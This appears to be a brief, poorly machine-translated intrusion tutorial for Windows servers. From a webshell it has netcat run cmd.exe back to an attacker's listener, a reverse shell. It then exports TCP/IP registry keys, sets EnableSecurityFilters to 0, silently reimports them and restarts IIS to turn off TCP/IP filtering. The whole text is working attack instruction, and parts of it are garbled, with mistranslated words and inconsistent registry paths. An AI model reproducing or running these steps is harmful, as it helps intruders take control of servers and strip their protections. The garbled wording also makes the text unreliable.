Author: Hippo epic http://www.wrsky.com
1. Bushing with NC to get a shell
This machine monitors NC -L -P 32
WebShell runs:
x: /xxx/serv-u.exe "x: /xxx/nc.exe -e cmd.exe *. *. *. * Port"
Get a shell
2.CMD leads the registry file C: /> regedit -e x: /xxx/1.reg hkey_local_machine / system / controlset001 / services / TCPIP
C: /> regedit -e x: /xxx/2.reg hkey_local_machine / system / controlset002 / service / tcpip
C: /> regedit -e x: /xxx/3.reg hkey_local_machine / system / currentcontrolset / service / tcpip
Modify each file enableSecurityFilters to change the last 1 to 0
3. Import the registry file into x: / xxx> regedit -s 1.regx: / xxx> regedit -s 2.regx: / xxx> regedit -s 3.REG-S is no prompt
Restart command Iisreset / Reboot
Complete TCP / IP filtering limit
